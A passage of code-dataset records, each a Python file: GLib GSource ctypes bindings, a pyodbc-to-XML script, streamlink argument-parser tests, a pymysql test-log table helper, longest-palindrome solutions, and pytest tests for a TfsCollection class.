POINTER(c_int)\n_PangoFontset = POINTER(c_int)\n_GdkWindow = POINTER(c_int)\n__PangoFontDescription = POINTER(c_int)\n__GtkBorder = POINTER(c_int)\n__GError = POINTER(c_int)\n__PangoCoverage = POINTER(c_int)\n_WebKitViewportAttributes = POINTER(c_int)\n_JSClass = POINTER(c_int)\n_WebKitWebHistoryItem = POINTER(c_int)\n__cairo_t = POINTER(c_int)\n__GWeakRef = POINTER(c_int)\n__GdkVisual = POINTER(c_int)\n__GdkEventButton = POINTER(c_int)\n_GdkDevice = POINTER(c_int)\n__PangoRectangle = POINTER(c_int)\n__GtkAccelGroup = POINTER(c_int)\n_GObject = 
POINTER(c_int)\n__GtkIconSource = POINTER(c_int)\n__JSContext = POINTER(c_int)\n_PangoFontsetSimple = POINTER(c_int)\n__GtkAllocation = POINTER(c_int)\n__GtkWidget = POINTER(c_int)\n_PangoLayoutLine = POINTER(c_int)\n__GtkIconSet = POINTER(c_int)\n_WebKitWebView = POINTER(c_int)\n__PangoTabArray = POINTER(c_int)\n_WebKitHitTestResult = POINTER(c_int)\n__GValue = POINTER(c_int)\n_GdkDeviceManager = POINTER(c_int)\n_GdkCursor = POINTER(c_int)\n_WebKitDOMDocument = POINTER(c_int)\n__PangoMatrix = POINTER(c_int)\n__GtkPrintOperation = POINTER(c_int)\n_PangoContext = POINTER(c_int)\n__GList = POINTER(c_int)\n__WebKitWebView = POINTER(c_int)\n_WebKitWebWindowFeatures = POINTER(c_int)\n_PangoCoverage = POINTER(c_int)\n_GParamSpec = POINTER(c_int)\n_GList = POINTER(c_int)\n__GdkRGBA = POINTER(c_int)\n__GTimeVal = POINTER(c_int)\n__GSourceFuncs = POINTER(c_int)\n__JSPropertyNameAccumulator = POINTER(c_int)\n__PangoGlyphString = POINTER(c_int)\n__JSGlobalContext = POINTER(c_int)\n_WebKitSecurityOrigin = POINTER(c_int)\n__GObjectClass = POINTER(c_int)\n__GSList = POINTER(c_int)\n_PangoAnalysis = POINTER(c_int)\n__GdkWindowAttr = POINTER(c_int)\n_SoupMessage = POINTER(c_int)\n_WebKitWebDataSource = POINTER(c_int)\n__GdkColor = POINTER(c_int)\n_JSContextGroup = POINTER(c_int)\n__GdkRectangle = POINTER(c_int)\n__PangoLanguage = POINTER(c_int)\n_PangoAttrList = POINTER(c_int)\n__gunichar = POINTER(c_int)\n__GdkWMDecoration = POINTER(c_int)\n__PangoLogAttr = POINTER(c_int)\n_PangoLayout = POINTER(c_int)\n_JSPropertyNameArray = POINTER(c_int)\n__JSObject = POINTER(c_int)\n_WebKitWebNavigationAction = POINTER(c_int)\n_GtkStyle = POINTER(c_int)\n__GParameter = POINTER(c_int)\n__GtkStyle = POINTER(c_int)\n__GIcon = POINTER(c_int)\n__GtkWindow = POINTER(c_int)\n_PangoLayoutRun = POINTER(c_int)\n__cairo_pattern_t = POINTER(c_int)\n__GdkPixbuf = POINTER(c_int)\n_WebKitGeolocationPolicyDecision = POINTER(c_int)\n_GtkSettings = POINTER(c_int)\n__GSourceCallbackFuncs = 
POINTER(c_int)\n__GtkTargetEntry = POINTER(c_int)\n__GtkApplication = POINTER(c_int)\n_GtkClipboard = POINTER(c_int)\n_GByteArray = POINTER(c_int)\n__GdkScreen = POINTER(c_int)\n_PangoLanguage = POINTER(c_int)\n__GdkDevice = POINTER(c_int)\n_PangoTabArray = POINTER(c_int)\n\"\"\"Enumerations\"\"\"\nPangoStyle = c_int\nPangoWeight = c_int\nPangoVariant = c_int\nPangoStretch = c_int\nPangoFontMask = c_int\nGtkWidgetHelpType = c_int\nGtkTextDirection = c_int\nGtkSizeRequestMode = c_int\nGtkAlign = c_int\nGdkPixbufError = c_int\nGdkColorspace = c_int\nGdkPixbufAlphaMode = c_int\nGtkIconSize = c_int\nGdkWindowType = c_int\nGdkWindowWindowClass = c_int\nGdkWindowHints = c_int\nGdkGravity = c_int\nGdkWindowEdgeh = c_int\nGdkWindowTypeHint = c_int\nGdkWindowAttributesType = c_int\nGdkFilterReturn = c_int\nGdkModifierType = c_int\nGdkWMDecoration = c_int\nGdkWMFunction = c_int\nGdkInputSource = c_int\nGdkInputMode = c_int\nGdkAxisUse = c_int\nGdkDeviceType = c_int\nGdkGrabOwnership = c_int\nGdkCursorType = c_int\nGdkVisualType = c_int\nGdkByteOrder = c_int\nGtkRcFlags = c_int\nGtkRcTokenType = c_int\nPangoWrapMode = c_int\nPangoEllipsizeMode = c_int\nPangoAlignment = c_int\nWebKitLoadStatus = c_int\nWebKitNavigationResponse = c_int\nWebKitWebViewTargetInfo = c_int\nWebKitWebViewViewMode = c_int\nWebKitEditingBehavior = c_int\nGdkInputSource = c_int\nGdkInputMode = c_int\nGdkAxisUse = c_int\nGdkDeviceType = c_int\nGdkGrabOwnership = c_int\nGtkDialogFlags = c_int\nGtkResponseType = c_int\nWebKitWebNavigationReason = c_int\nPangoWrapMode = c_int\nPangoEllipsizeMode = c_int\nPangoAlignment = c_int\n\nimport gobject__GObject\nclass GSource( gobject__GObject.GObject):\n \"\"\"Class GSource Constructors\"\"\"\n def __init__( self, struct_size, obj = None):\n if obj: self._object = obj\n else:\n libgobject.g_source_new.restype = POINTER(c_int)\n \n libgobject.g_source_new.argtypes = [guint]\n self._object = libgobject.g_source_new(struct_size, )\n\n \"\"\"Methods\"\"\"\n def 
remove_poll( self, fd, ):\n if fd: fd = fd._object\n else: fd = POINTER(c_int)()\n\n libgobject.g_source_remove_poll.argtypes = [_GSource,_GPollFD]\n \n libgobject.g_source_remove_poll( self._object,fd )\n\n def set_callback_indirect( self, callback_data, callback_funcs, ):\n if callback_funcs: callback_funcs = callback_funcs._object\n else: callback_funcs = POINTER(c_int)()\n\n libgobject.g_source_set_callback_indirect.argtypes = [_GSource,gpointer,_GSourceCallbackFuncs]\n \n libgobject.g_source_set_callback_indirect( self._object,callback_data,callback_funcs )\n\n def destroy( self, ):\n\n libgobject.g_source_destroy.argtypes = [_GSource]\n \n libgobject.g_source_destroy( self._object )\n\n def get_id( self, ):\n\n libgobject.g_source_get_id.restype = guint\n libgobject.g_source_get_id.argtypes = [_GSource]\n \n return libgobject.g_source_get_id( self._object )\n\n def get_context( self, ):\n\n libgobject.g_source_get_context.restype = _GMainContext\n libgobject.g_source_get_context.argtypes = [_GSource]\n from gobject import GMainContext\n return GMainContext(None,None, obj=libgobject.g_source_get_context( self._object ) or POINTER(c_int)())\n\n def set_can_recurse( self, can_recurse, ):\n\n libgobject.g_source_set_can_recurse.argtypes = [_GSource,gboolean]\n \n libgobject.g_source_set_can_recurse( self._object,can_recurse )\n\n def get_name( self, ):\n\n libgobject.g_source_get_name.restype = c_char_p\n libgobject.g_source_get_name.argtypes = [_GSource]\n \n return libgobject.g_source_get_name( self._object )\n\n def get_priority( self, ):\n\n libgobject.g_source_get_priority.restype = gint\n libgobject.g_source_get_priority.argtypes = [_GSource]\n \n return libgobject.g_source_get_priority( self._object )\n\n def ref( self, ):\n\n libgobject.g_source_ref.restype = _GSource\n libgobject.g_source_ref.argtypes = [_GSource]\n from gobject import GSource\n return GSource( obj=libgobject.g_source_ref( self._object ) or POINTER(c_int)())\n\n def remove_child_source( 
self, child_source, ):\n if child_source: child_source = child_source._object\n else: child_source = POINTER(c_int)()\n\n libgobject.g_source_remove_child_source.argtypes = [_GSource,_GSource]\n \n libgobject.g_source_remove_child_source( self._object,child_source )\n\n def add_child_source( self, child_source, ):\n if child_source: child_source = child_source._object\n else: child_source = POINTER(c_int)()\n\n libgobject.g_source_add_child_source.argtypes = [_GSource,_GSource]\n \n libgobject.g_source_add_child_source( self._object,child_source )\n\n def set_name( self, name, ):\n\n libgobject.g_source_set_name.argtypes = [_GSource,c_char_p]\n \n libgobject.g_source_set_name( self._object,name )\n\n def get_can_recurse( self, ):\n\n libgobject.g_source_get_can_recurse.restype = gboolean\n libgobject.g_source_get_can_recurse.argtypes = [_GSource]\n \n return libgobject.g_source_get_can_recurse( self._object )\n\n def get_current_time( self, timeval, ):\n if timeval: timeval = timeval._object\n else: timeval = POINTER(c_int)()\n\n libgobject.g_source_get_current_time.argtypes = [_GSource,_GTimeVal]\n \n libgobject.g_source_get_current_time( self._object,timeval )\n\n def is_destroyed( self, ):\n\n libgobject.g_source_is_destroyed.restype = gboolean\n libgobject.g_source_is_destroyed.argtypes = [_GSource]\n \n return libgobject.g_source_is_destroyed( self._object )\n\n def unref( self, ):\n\n libgobject.g_source_unref.argtypes = [_GSource]\n \n libgobject.g_source_unref( self._object )\n\n def add_poll( self, fd, ):\n if fd: fd = fd._object\n else: fd = POINTER(c_int)()\n\n libgobject.g_source_add_poll.argtypes = [_GSource,_GPollFD]\n \n libgobject.g_source_add_poll( self._object,fd )\n\n def set_priority( self, priority, ):\n\n libgobject.g_source_set_priority.argtypes = [_GSource,gint]\n \n libgobject.g_source_set_priority( self._object,priority )\n\n def set_funcs( self, funcs, ):\n if funcs: funcs = funcs._object\n else: funcs = POINTER(c_int)()\n\n 
libgobject.g_source_set_funcs.argtypes = [_GSource,_GSourceFuncs]\n \n libgobject.g_source_set_funcs( self._object,funcs )\n\n def get_time( self, ):\n\n libgobject.g_source_get_time.restype = gint64\n libgobject.g_source_get_time.argtypes = [_GSource]\n \n return libgobject.g_source_get_time( self._object )\n\n def set_name_by_id( self, tag, name, ):\n\n libgobject.g_source_set_name_by_id.argtypes = [_GSource,guint,c_char_p]\n \n libgobject.g_source_set_name_by_id( self._object,tag,name )\n\n def set_callback( self, func, data, notify, ):\n\n libgobject.g_source_set_callback.argtypes = [_GSource,GSourceFunc,gpointer,GDestroyNotify]\n \n libgobject.g_source_set_callback( self._object,func,data,notify )\n\n def attach( self, context, ):\n if context: context = context._object\n else: context = POINTER(c_int)()\n\n libgobject.g_source_attach.restype = guint\n libgobject.g_source_attach.argtypes = [_GSource,_GMainContext]\n \n return libgobject.g_source_attach( self._object,context )\n\n @staticmethod\n def remove_by_user_data( user_data,):\n libgobject.g_source_remove_by_user_data.restype = gboolean\n libgobject.g_source_remove_by_user_data.argtypes = [gpointer]\n \n return libgobject.g_source_remove_by_user_data(user_data, )\n\n @staticmethod\n def remove( tag,):\n libgobject.g_source_remove.restype = gboolean\n libgobject.g_source_remove.argtypes = [guint]\n \n return libgobject.g_source_remove(tag, )\n\n @staticmethod\n def remove_by_funcs_user_data( funcs, user_data,):\n if funcs: funcs = funcs._object\n else: funcs = POINTER(c_int)()\n libgobject.g_source_remove_by_funcs_user_data.restype = gboolean\n libgobject.g_source_remove_by_funcs_user_data.argtypes = [_GSourceFuncs,gpointer]\n \n return libgobject.g_source_remove_by_funcs_user_data(funcs, user_data, 
)\n\n","sub_path":"pyggi/gobject__GSource.py","file_name":"gobject__GSource.py","file_ext":"py","file_size_in_byte":16547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408240660","text":"import pyodbc \r\nimport xml.etree.ElementTree as ET\r\nimport re\r\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\r\n \"Server=.;\"\r\n \"Database=qsrxGIGI;\"\r\n \"Trusted_Connection=yes;\")\r\n\r\n\r\ncursor = cnxn.cursor()\r\ncursor.execute('SELECT StoreCd FROM vxstore where StoreId <5')\r\n\r\nRoot = ET.Element(\"Data\")\r\nfor row in cursor: \r\n data = str(row)\r\n data = re.sub('[('',)]', '', data)\r\n ET.SubElement(Root, \"Row\",stcode = data)\r\ntree = ET.ElementTree(Root)\r\ntree.write(\"nik.xml\")","sub_path":"python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610094137","text":"import unittest\nfrom argparse import ArgumentTypeError\n\nfrom streamlink.utils.args import (\n boolean, comma_list, comma_list_filter, filesize, keyvalue, num\n)\n\n\nclass TestUtilsArgs(unittest.TestCase):\n\n def test_boolean_true(self):\n self.assertEqual(boolean('1'), True)\n self.assertEqual(boolean('on'), True)\n self.assertEqual(boolean('true'), True)\n self.assertEqual(boolean('yes'), True)\n self.assertEqual(boolean('Yes'), True)\n\n def test_boolean_false(self):\n self.assertEqual(boolean('0'), False)\n self.assertEqual(boolean('false'), False)\n self.assertEqual(boolean('no'), False)\n self.assertEqual(boolean('No'), False)\n self.assertEqual(boolean('off'), False)\n\n def test_boolean_error(self):\n with self.assertRaises(ArgumentTypeError):\n boolean('yesno')\n\n with self.assertRaises(ArgumentTypeError):\n boolean('FOO')\n\n with self.assertRaises(ArgumentTypeError):\n boolean('2')\n\n def test_comma_list(self):\n # (values, result)\n test_data = [\n ('foo.bar,example.com', 
['foo.bar', 'example.com']),\n ('/var/run/foo,/var/run/bar', ['/var/run/foo', '/var/run/bar']),\n ('foo bar,24', ['foo bar', '24']),\n ('hls', ['hls']),\n ]\n\n for _v, _r in test_data:\n self.assertEqual(comma_list(_v), _r)\n\n def test_comma_list_filter(self):\n # (acceptable, values, result)\n test_data = [\n (['foo', 'bar', 'com'], 'foo,bar,example.com', ['foo', 'bar']),\n (['/var/run/foo', 'FO'], '/var/run/foo,/var/run/bar',\n ['/var/run/foo']),\n (['hls', 'hls5', 'dash'], 'hls,hls5', ['hls', 'hls5']),\n (['EU', 'RU'], 'DE,FR,RU,US', ['RU']),\n ]\n\n for _a, _v, _r in test_data:\n func = comma_list_filter(_a)\n self.assertEqual(func(_v), _r)\n\n def test_filesize(self):\n self.assertEqual(filesize('2000'), 2000)\n self.assertEqual(filesize('11KB'), 1024 * 11)\n self.assertEqual(filesize('12MB'), 1024 * 1024 * 12)\n self.assertEqual(filesize('1KB'), 1024)\n self.assertEqual(filesize('1MB'), 1024 * 1024)\n self.assertEqual(filesize('2KB'), 1024 * 2)\n\n def test_filesize_error(self):\n with self.assertRaises(ValueError):\n filesize('FOO')\n\n with self.assertRaises(ValueError):\n filesize('0.00000')\n\n def test_keyvalue(self):\n # (value, result)\n test_data = [\n ('X-Forwarded-For=127.0.0.1', ('X-Forwarded-For', '127.0.0.1')),\n ('Referer=https://foo.bar', ('Referer', 'https://foo.bar')),\n (\n 'User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:60.0)'\n ' Gecko/20100101 Firefox/60.0',\n ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) '\n 'Gecko/20100101 Firefox/60.0')\n ),\n ('domain=example.com', ('domain', 'example.com')),\n ]\n\n for _v, _r in test_data:\n self.assertEqual(keyvalue(_v), _r)\n\n def test_keyvalue_error(self):\n with self.assertRaises(ValueError):\n keyvalue('127.0.0.1')\n\n def test_num(self):\n # (value, func, result)\n test_data = [\n ('33', num(int, 5, 120), 33),\n ('234', num(int, min=10), 234),\n ('50.222', num(float, 10, 120), 50.222),\n ]\n\n for _v, _f, _r in test_data:\n self.assertEqual(_f(_v), _r)\n\n def 
test_num_error(self):\n with self.assertRaises(ArgumentTypeError):\n func = num(int, 5, 10)\n func('3')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(int, max=11)\n func('12')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(int, min=15)\n func('8')\n\n with self.assertRaises(ArgumentTypeError):\n func = num(float, 10, 20)\n func('40.222')\n","sub_path":"tests/test_utils_args.py","file_name":"test_utils_args.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"530039900","text":"import pymysql.cursors\n\n\nclass Database:\n\n # Layout for table 'test_log'\n # id: 2^64 int, not null, auto increment\n # date_time: 24-char varchar, not null, format YYYY-MM-DD HH:MM:SS, when test was started\n # test_type: 16-char varchar, not null, what test type is used\n # delay: 2^32 int, nut null, delay in ms\n # extra: 32-char varchar\n\n def __init__(self, host, user, password, database, table, charset='utf8'):\n self.host = host\n self.user = user\n self.password = password\n self.database = database\n self.table = table\n self.charset = charset\n self.connection = None\n\n def open(self):\n self.test_closed_connection()\n\n # Open connection\n self.connection = pymysql.connect(\n host=self.host,\n user=self.user,\n password=self.password,\n db=self.database,\n charset=self.charset,\n cursorclass=pymysql.cursors.DictCursor)\n\n # Check if table exists, if not, create it.\n query = \"SELECT * FROM information_schema.tables WHERE table_schema = %s AND table_name = %s LIMIT 1;\"\n args = (self.database, self.table)\n result = self.execute_sql(query, args)\n if len(result) is 0:\n return self.create_table()\n else: # DEV\n self.drop_table()\n return self.create_table()\n\n def close(self):\n self.test_open_connection()\n self.connection.close()\n\n def drop_table(self):\n self.test_open_connection()\n query = \"DROP TABLE {};\".format(self.table)\n 
print(\"Dropping table ...\")\n return self.execute_sql(query)\n\n def create_table(self):\n self.test_open_connection()\n query = \"\"\"CREATE TABLE {} (\n id BIGINT UNSIGNED NOT NULL AUTO_INCREMENT,\n date_time VARCHAR(24) COLLATE utf8_bin NOT NULL,\n test_type VARCHAR(16) COLLATE utf8_bin NOT NULL,\n delay INT NOT NULL,\n extra VARCHAR(32) COLLATE utf8_bin,\n PRIMARY KEY(id)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;\"\"\".format(self.table)\n print(\"Table not found, creating new ...\")\n return self.execute_sql(query)\n\n def save_test(self, date_time, test_type, delay, extra=None):\n self.test_open_connection()\n query = \"INSERT INTO {} (date_time, test_type, delay, extra) VALUES (%s, %s, %s, %s);\".format(self.table)\n args = (date_time, test_type, delay, extra)\n return self.execute_sql(query, args)\n\n def get_last_test(self):\n self.test_open_connection()\n query = \"SELECT * FROM {0} WHERE ID = (SELECT MAX(ID) FROM {0});\".format(self.table)\n return self.execute_sql_fetch_one(query)\n\n def execute_sql(self, query, args=None):\n self.test_open_connection()\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n return cursor.fetchall()\n\n def execute_sql_fetch_one(self, query, args=None):\n self.test_open_connection()\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n return cursor.fetchone()\n\n def test_open_connection(self):\n if not self.connection:\n raise ValueError(\"Connection is closed.\")\n\n def test_closed_connection(self):\n if self.connection and self.connection.open():\n raise ValueError(\"Connection is already open.\")\n","sub_path":"database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34117800","text":"def longestPalindrome(s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n 
'''\n len_s = len(s)\n if len_s <= 1:\n return s\n m = {'center': 0, 'one_side': 0}\n for i in range(1, len_s):\n if i < len_s - 1 and s[i - 1] == s[i + 1]:\n left = i\n right = i\n if s[i] == s[i - 1]:\n left = i-1\n right = i\n temp = 1\n k = 1\n while left >=0 and right < len_s and s[left-k]==s[right-k]:\n temp += 2\n k += 1\n if m['one_side'] < temp:\n m['one_side'] = temp\n m['center'] = i\n print('ji数', m)\n return s[(m['center'] - m['one_side']):(m['center'] + m['one_side'] + 1)]\n '''\n #中心扩散法\n len_s = len(s)\n if len_s <= 1:\n return s\n # 至少是 1\n longest_palindrome = 1\n longest_palindrome_str = s[0]\n\n for i in range(len_s):\n palindrome_odd, odd_len = center_spread(s, len_s, i, i)\n palindrome_even, even_len = center_spread(s, len_s, i, i + 1)\n\n # 当前找到的最长回文子串\n cur_max_sub = palindrome_odd if odd_len >= even_len else palindrome_even\n if len(cur_max_sub) > longest_palindrome:\n longest_palindrome = len(cur_max_sub)\n longest_palindrome_str = cur_max_sub\n\n return longest_palindrome_str\n\ndef center_spread(s, size, left, right):\n \"\"\"\n left = right 的时候,此时回文中心是一条线,回文串的长度是奇数\n right = left + 1 的时候,此时回文中心是任意一个字符,回文串的长度是偶数\n \"\"\"\n l = left\n r = right\n while l >= 0 and r < size and s[l] == s[r]:\n l -= 1\n r += 1\n return s[l + 1:r], r - l - 1\n\ns = \"cbbd\"\n#print(longestPalindrome(s))\n\ndef longestPalindrome1(s):\n #动态规划\n len_s = len(s)\n if len_s <= 1:\n return s\n #定义状态函数\n dp = [[0]*len_s]*len_s\n #定义回文串长度,回文串切片\n longest_l = 1\n res = s[0]\n #\n for r in range(1,len_s):\n for c in range(r):\n if s[r] == s[c] and (dp[c+1][r-1] or r-c<=2):\n dp[c][r]=1\n cur_len = r-c+1\n if cur_len > longest_l:\n longest_l = cur_len\n res = s[c:r + 1]\n '''\n for item in dp:\n print(item)\n print('---')\n '''\n return res\n\nprint(longestPalindrome1(s))\n","sub_path":"005 最长回文子串.py","file_name":"005 最长回文子串.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"348995189","text":"import os\nimport pathlib\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom tfs import read_tfs\nfrom tfs.collection import Tfs, TfsCollection\nfrom tfs.frame import TfsDataFrame\n\nINPUT_DIR = pathlib.Path(__file__).parent / \"inputs\"\n\n\nclass CollectionTest(TfsCollection):\n file = Tfs(\"file_{}.tfs\")\n nofile = Tfs(\"nofile_{}.tfs\")\n filex = Tfs(\"file_x.tfs\", two_planes=False)\n value = 10\n\n def _get_filename(self, template, plane=\"\"):\n return template.format(plane)\n\n\nclass TestRead:\n\n def test_read_pathlib_input(self, _input_dir_pathlib: pathlib.Path, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert_frame_equal(_tfs_x, c.file_x)\n assert_frame_equal(_tfs_x, c.filex)\n # test that both capitalized and lowered plane keys are accepted\n assert_frame_equal(_tfs_x, c.file[\"x\"])\n assert_frame_equal(_tfs_x, c.file[\"X\"])\n assert_frame_equal(_tfs_y, c.file[\"y\"])\n assert_frame_equal(_tfs_y, c.file[\"Y\"])\n assert c.value == 10\n\n def test_read_str_input(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame):\n c = CollectionTest(_input_dir_str, allow_write=False)\n assert_frame_equal(_tfs_x, c.file_x)\n assert_frame_equal(_tfs_x, c.filex)\n # test that both capitalized and lowered plane keys are accepted\n assert_frame_equal(_tfs_x, c.file[\"x\"])\n assert_frame_equal(_tfs_x, c.file[\"X\"])\n assert_frame_equal(_tfs_y, c.file[\"y\"])\n assert_frame_equal(_tfs_y, c.file[\"Y\"])\n assert c.value == 10\n\n\nclass TestWrite:\n\n def test_write(self, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path)\n file_x_path = tmp_path / \"nofile_x.tfs\"\n assert not file_x_path.is_file()\n\n c.nofile_x = _tfs_y # only assigns dataframe without writing (use _tfs_y so that we can set _tfs_x below)\n assert not file_x_path.is_file()\n assert_frame_equal(_tfs_y, c.nofile_x)\n\n c.allow_write = 
True\n c.nofile_x = _tfs_x # should overwrite _tfs_y in buffer\n assert file_x_path.is_file()\n assert_frame_equal(_tfs_x, c.nofile_x)\n\n tfs_x_loaded = _read_tfs(file_x_path)\n assert_frame_equal(_tfs_x, tfs_x_loaded)\n\n c.nofile[\"y\"] = _tfs_y\n file_y_path = tmp_path / \"nofile_y.tfs\"\n assert file_y_path.is_file()\n assert_frame_equal(_tfs_y, c.nofile[\"y\"])\n assert_frame_equal(_tfs_y, c.nofile[\"Y\"])\n\n def test_write_tfs(self, _tfs_x: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path)\n name = \"nofile_x.tfs\"\n assert not (tmp_path / name).is_file()\n c.write_tfs(name, _tfs_x)\n assert (tmp_path / name).is_file()\n\n def test_write_to(self, _tfs_x: TfsDataFrame, tmp_path):\n class WriteToCollectionTest(TfsCollection):\n file = Tfs(\"file_{}.tfs\")\n filex = Tfs(\"file_x.tfs\", two_planes=False)\n\n def _get_filename(self, template, plane=\"\"):\n return template.format(plane)\n\n def _write_to(self, df, template, plane=\"\"):\n return f\"out_{self._get_filename(template, plane)}\", df\n\n c = WriteToCollectionTest(tmp_path, allow_write=True)\n filepath = tmp_path / \"out_file_x.tfs\"\n\n assert not filepath.exists()\n c.file_x = _tfs_x\n assert filepath.exists()\n\n filepath.unlink()\n\n assert not filepath.exists()\n c.filex = _tfs_x\n assert filepath.exists()\n\n def test_buffer_flush(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path, allow_write=True)\n\n c.file_x = _tfs_x.copy()\n c.nofile_y = _tfs_y.copy()\n tfs_x = _tfs_x.drop(columns=\"NAME\") # index reading below drops columns, TfsCollections does not\n tfs_y = _tfs_y.drop(columns=\"NAME\")\n\n c.file_x.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -199\n c.nofile_y.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -19\n\n assert_frame_equal(tfs_x, read_tfs(c.get_path(\"file_x\"), index=c.INDEX))\n assert_frame_equal(tfs_y, read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX))\n\n c.flush()\n\n tfs_x_after_flush = read_tfs(c.get_path(\"file_x\"), 
index=c.INDEX)\n tfs_y_after_flush = read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX)\n with pytest.raises(AssertionError):\n assert_frame_equal(tfs_x, tfs_x_after_flush )\n\n with pytest.raises(AssertionError):\n assert_frame_equal(tfs_y, tfs_y_after_flush)\n\n assert tfs_x_after_flush.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] == -199\n assert tfs_y_after_flush.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] == -19\n\n def test_buffer_flush_nowrite(self, _input_dir_str: str, _tfs_x: TfsDataFrame, _tfs_y: TfsDataFrame, tmp_path):\n c = CollectionTest(tmp_path, allow_write=True)\n\n c.file_x = _tfs_x.copy()\n c.nofile_y = _tfs_y.copy()\n tfs_x = _tfs_x.drop(columns=\"NAME\") # index reading below drops columns, TfsCollections does not\n tfs_y = _tfs_y.drop(columns=\"NAME\")\n\n c.file_x.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -199\n c.nofile_y.loc[\"BPMSX.4L2.B1\", \"NUMBER\"] = -19\n\n assert_frame_equal(tfs_x, read_tfs(c.get_path(\"file_x\"), index=c.INDEX))\n assert_frame_equal(tfs_y, read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX))\n\n c.allow_write = False\n with pytest.raises(IOError):\n c.flush()\n\n tfs_x_after_flush = read_tfs(c.get_path(\"file_x\"), index=c.INDEX)\n tfs_y_after_flush = read_tfs(c.get_path(\"nofile_y\"), index=c.INDEX)\n assert_frame_equal(tfs_x, tfs_x_after_flush)\n assert_frame_equal(tfs_y, tfs_y_after_flush)\n\n\nclass TestFilenames:\n\n def test_tfscollection_getfilename_not_implemented(self):\n with pytest.raises(NotImplementedError):\n TfsCollection._get_filename(\"doesnt matter\")\n\n def test_get_filename(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.get_filename(\"file_y\") == \"file_y.tfs\"\n assert c.get_filename(\"filex\") == \"file_x.tfs\"\n assert c.get_filename(\"nofile_x\") == \"nofile_x.tfs\"\n\n def test_get_filename_not_there(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n with pytest.raises(AttributeError):\n 
c.get_filename(\"doesn't matter either\")\n\n def test_filenames(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.filenames.file_y == \"file_y.tfs\"\n assert c.filenames.filex == \"file_x.tfs\"\n assert c.filenames.nofile_x == \"nofile_x.tfs\"\n\n assert c.filenames[\"file_x\"] == \"file_x.tfs\"\n assert c.filenames[\"nofile_y\"] == \"nofile_y.tfs\"\n\n exist_properties = \"file_x\", \"file_y\", \"filex\"\n not_exist_properties = \"nofile_x\", \"nofile_y\"\n exist_files = \"file_x.tfs\", \"file_y.tfs\"\n not_exist_files = \"nofile_x.tfs\", \"nofile_y.tfs\"\n\n assert c.filenames()[\"file_x\"] == \"file_x.tfs\"\n assert c.filenames()[\"nofile_y\"] == \"nofile_y.tfs\"\n\n assert all(f in c.filenames().keys() for f in exist_properties)\n assert all(f in c.filenames().keys() for f in not_exist_properties)\n assert all(f in c.filenames().values() for f in exist_files)\n assert all(f in c.filenames().values() for f in not_exist_files)\n\n assert all(f in c.filenames(exist=True).keys() for f in exist_properties)\n assert all(f not in c.filenames(exist=True).keys() for f in not_exist_properties)\n assert all(f in c.filenames(exist=True).values() for f in exist_files)\n assert all(f not in c.filenames(exist=True).values() for f in not_exist_files)\n\n def test_get_path(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n assert c.get_path(\"file_y\") == _input_dir_pathlib / \"file_y.tfs\"\n assert c.get_path(\"filex\") == _input_dir_pathlib / \"file_x.tfs\"\n assert c.get_path(\"nofile_x\") == _input_dir_pathlib / \"nofile_x.tfs\"\n\n\nclass TestOther:\n\n def test_access_methods(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib, allow_write=False)\n\n # Getting (partly tested in read-test as well)\n assert_frame_equal(c.file_x, c.file[\"x\"])\n assert_frame_equal(c.file_x, c.file[\"X\"])\n assert_frame_equal(c.file_x, 
